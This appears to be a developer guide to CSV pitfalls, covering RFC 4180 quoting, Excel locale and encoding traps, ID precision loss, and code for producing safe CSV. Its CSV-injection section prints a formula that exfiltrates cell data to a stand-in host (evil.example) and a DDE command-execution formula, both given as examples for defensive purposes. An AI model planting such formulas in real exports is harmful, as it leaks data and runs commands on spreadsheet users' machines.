CSV pitfalls
RFC 4180 rules, why Excel opens your CSV wrong, formula injection via = and @, encoding traps, and a checklist for producing safe CSV.
CSV looks like the simplest format ever invented. It isn't. There's a spec nobody follows, an "Excel dialect" that half the world uses, and several places where "just split on commas" will silently corrupt your data or open a security hole. Here's what actually matters.
The RFC 4180 rules — the closest thing to a spec
- Records separated by CRLF (yes, really).
- Fields separated by commas.
- Fields containing commas, quotes, or line breaks must be wrapped in double quotes.
- Double quotes inside a quoted field are escaped by doubling: "".
- Optional header row on line 1.
- All rows should have the same number of fields.
Real CSV in the wild uses LF (not CRLF), semicolons in European locales, tabs in "TSV", and inconsistent quoting. A hand-written parser will get most of it right and one edge case wrong. Use a library: PapaParse in JS, Python's csv module, Go's encoding/csv. Never split(",").
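To make the quoting rules concrete, here is a minimal sketch using Python's standard csv module. The sample record is invented for illustration; it packs a comma, a doubled quote, and a line break into one field, which is exactly where a naive split falls apart.

```python
import csv
import io

# One header row, then a record whose second field contains a comma,
# an escaped (doubled) quote, and an embedded line break.
raw = 'id,comment\r\n1,"She said ""hi"", then left.\nNew line here"\r\n'

# Naive approach: splitting on commas cuts the quoted field apart.
naive_first_data_line = raw.split("\r\n")[1]
naive_fields = naive_first_data_line.split(",")  # 3 pieces instead of 2 fields

# Library approach: csv.reader applies the quoting rules.
# newline="" leaves line endings untouched so the csv module can handle
# line breaks inside quoted fields itself.
rows = list(csv.reader(io.StringIO(raw, newline="")))

# Writing: csv.writer adds quotes and doubles inner quotes only where needed,
# and terminates records with CRLF by default.
out = io.StringIO(newline="")
csv.writer(out).writerows(rows)
round_tripped = out.getvalue()
```

Here `rows[1]` comes back as two fields, with the comment intact, and writing the parsed rows out again reproduces the original text.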
Why Excel opens your CSV wrong
The three most common culprits:
- Locale. German, French, and Spanish Excel treat a semicolon (;) as the delimiter and a comma (,) as the decimal separator. A "comma-separated" file will open as one giant column.
- Numbers becoming dates. 1/2 becomes "1-Feb". Gene names like SEPT1 become "1-Sep". Prefix with = and quote: ="SEPT1", or ship .xlsx instead.
- UTF-8 without a BOM. Excel on Windows assumes the legacy system code page (Windows-1252 on most Western installs) unless you prepend a UTF-8 BOM (0xEF 0xBB 0xBF). Accented characters end up as mojibake without it. On modern Excel (Microsoft 365) this is less common but still bites.
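For the BOM and locale issues, a small sketch in Python follows. The function name `excel_friendly_csv` and the sample rows are hypothetical; the only library behavior relied on is that the "utf-8-sig" codec prepends the BOM bytes and that csv.writer accepts a `delimiter` argument.

```python
import csv
import io

def excel_friendly_csv(rows, delimiter=","):
    """Return CSV bytes with a UTF-8 BOM so Excel on Windows detects the encoding."""
    buf = io.StringIO(newline="")
    csv.writer(buf, delimiter=delimiter).writerows(rows)
    # The "utf-8-sig" codec prepends the BOM bytes EF BB BF when encoding.
    return buf.getvalue().encode("utf-8-sig")

# Accented characters survive because the BOM signals UTF-8.
data = excel_friendly_csv([["name", "city"], ["Zoë", "Köln"]])

# For a semicolon-locale audience, switch the delimiter; the decimal comma
# is then ordinary field content and needs no quoting.
semicolon_data = excel_friendly_csv([["price"], ["1,5"]], delimiter=";")
```

Whether to switch to semicolons depends on who opens the file; this sketch only shows that the choice is a one-argument change when a library does the writing.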
CSV injection — the security bug you didn't know you had
If a cell starts with =, +, -, or @, Excel and Google Sheets treat the rest of the cell as a formula when the user opens the file. An attacker who can put text in your CSV export can inject:
=HYPERLINK("https://evil.example/steal?d="&A1,"Click me")
=cmd|'/c calc'!A1 ← older Excel could execute this
Fix: when generating CSV from untrusted input, prefix any cell starting with one of those four characters with a single quote (') so the spreadsheet treats it as text, or apply another escape that neutralizes the formula. OWASP calls this out explicitly.
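The single-quote fix can be sketched in a few lines of Python. The helper names `neutralize` and `write_untrusted` are made up for this example, and the prefix list covers only the four characters named above.

```python
import csv
import io

# The four leading characters that spreadsheets interpret as a formula start.
FORMULA_PREFIXES = ("=", "+", "-", "@")

def neutralize(value):
    """Prefix formula-like strings with a single quote; leave everything else alone."""
    if isinstance(value, str) and value.startswith(FORMULA_PREFIXES):
        return "'" + value
    return value

def write_untrusted(rows):
    """Write rows to CSV text, neutralizing every cell before it is written."""
    buf = io.StringIO(newline="")
    writer = csv.writer(buf)
    for row in rows:
        writer.writerow([neutralize(cell) for cell in row])
    return buf.getvalue()

payload = '=HYPERLINK("https://evil.example/steal?d="&A1,"Click me")'
safe = write_untrusted([["name", "note"], ["Mallory", payload]])
```

One trade-off to be aware of: a string such as "-5" also gets the prefix. Passing real numbers as int or float rather than as strings avoids that, since only strings are checked.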
Delimiter and encoding checklist
| Concern | Recommendation |
|---|---|
| Delimiter | Comma for machine-to-machine, tab (TSV) for spreadsheet copy-paste. |
| Line ending | LF unless a Windows-only consumer requires CRLF. |
| Encoding | UTF-8. Add a BOM only if you know Excel-on-Windows users will open it directly. |
| Quoting | Quote every string. It's more bytes but eliminates a whole class of parser disagreements. |
| Nulls | Pick one convention: empty cell, NULL, or \N. Document it. |
| Booleans | Write true/false. Don't use 1/0 unless the schema is fixed. |
Numbers, IDs, and precision
- Long IDs lose precision. Excel treats numbers as IEEE 754 doubles and keeps only 15 significant digits; anything past that gets rounded. Store IDs as strings and pre-format with a leading quote or by writing .xlsx.
- Leading zeros disappear. ZIP codes, product SKUs, country phone codes. Same fix.
- Currency and thousands separators. 1,234.56 is a comma inside a number in US locale and a thousand+decimal swap in EU locale. Emit raw numbers; format in the UI.
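The precision and leading-zero problems are easy to reproduce outside Excel. The sketch below uses Python floats, which are also IEEE 754 doubles, as a stand-in for any double-based consumer; the ID and ZIP values are invented.

```python
import csv
import io

long_id = "12345678901234567"        # 17 digits, more than a double can hold exactly
as_double = float(long_id)            # what a double-based consumer ends up storing
round_trip = str(int(as_double))      # no longer equal to the original ID

# The csv module returns every field as a string, so nothing is lost
# until your own code decides to convert it.
raw = "id,zip\r\n12345678901234567,00501\r\n"
rows = list(csv.DictReader(io.StringIO(raw, newline="")))
kept_id = rows[0]["id"]               # still the full 17-digit string
kept_zip = rows[0]["zip"]             # still has its leading zeros

# Converting an identifier to a number is where the damage happens.
lost_zero = str(int(kept_zip))        # "501"
```

The practical rule this illustrates: treat identifiers as text end to end, and convert to numbers only the columns you actually do arithmetic on.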
Producing safe CSV — a template
- Use a library, always.
- Quote every field, or at least every field that could contain a delimiter, quote, or line break.
- Neutralize formula-injection prefixes on any untrusted string.
- Choose the encoding and delimiter based on the consumer, and document them in the filename or a README.
- Ship a header row.
- Emit ISO 8601 for dates, raw numbers for numbers, and true/false for booleans.
- If Excel-on-Windows users open the file directly, add a UTF-8 BOM.
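Pulled together, the template might look like the following Python sketch. Everything here is an illustrative assumption rather than a canonical implementation: the names `to_cell` and `safe_csv_bytes`, the choice of an empty cell for nulls, LF line endings, and treating every string as untrusted by default.

```python
import csv
import io
from datetime import date, datetime

FORMULA_PREFIXES = ("=", "+", "-", "@")

def to_cell(value, untrusted=True):
    """Convert one Python value to its CSV representation."""
    if value is None:
        return ""                              # null convention assumed here: empty cell
    if isinstance(value, bool):                # check bool first: bool is an int subclass
        return "true" if value else "false"
    if isinstance(value, (date, datetime)):
        return value.isoformat()               # ISO 8601
    if isinstance(value, str) and untrusted and value.startswith(FORMULA_PREFIXES):
        return "'" + value                     # neutralize formula-injection prefixes
    return value                               # numbers and ordinary strings pass through

def safe_csv_bytes(header, rows, bom=False):
    """Write a header plus rows; quote all strings, leave numbers raw."""
    buf = io.StringIO(newline="")
    # QUOTE_NONNUMERIC quotes every non-numeric field; LF endings per the checklist.
    writer = csv.writer(buf, quoting=csv.QUOTE_NONNUMERIC, lineterminator="\n")
    writer.writerow(header)
    for row in rows:
        writer.writerow([to_cell(v) for v in row])
    # Add the BOM only when Excel-on-Windows users open the file directly.
    return buf.getvalue().encode("utf-8-sig" if bom else "utf-8")

example = safe_csv_bytes(
    ["id", "joined", "active", "note", "score"],
    [["007", date(2024, 1, 31), True, "=SUM(A1:A9)", 12.5]],
)
```

In this sketch the ID stays a quoted string with its leading zeros, the date is written as 2024-01-31, the boolean as "true", the formula-like note gets a leading single quote, and 12.5 is emitted unquoted.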
Converting CSV to something better
Once CSV has served its purpose (transport, import), convert to a format with actual types. Our CSV to JSON, CSV to SQL, and CSV to Markdown converters run in the browser — no upload, no signup.
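If you would rather script the conversion, a rough Python sketch of CSV to JSON with explicit types follows. It is not how the converters mentioned above work; `csv_to_json` and its `converters` argument are hypothetical, and columns without a converter are simply left as strings.

```python
import csv
import io
import json

def csv_to_json(text, converters):
    """Parse CSV text and apply a per-column converter; unlisted columns stay strings."""
    reader = csv.DictReader(io.StringIO(text, newline=""))
    records = [
        {key: converters.get(key, str)(value) for key, value in row.items()}
        for row in reader
    ]
    return json.dumps(records)

text = "id,qty,active\r\n007,3,true\r\n"
result = csv_to_json(text, {"qty": int, "active": lambda s: s == "true"})
```

The point of the explicit converter map is that types are decided by you, per column, instead of being guessed: the ID keeps its leading zeros while qty and active become a real number and a real boolean.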
The one-line summary
CSV is a lowest-common-denominator format that only looks simple. Use a library, quote everything, and know what your consumer expects — and it will do its job.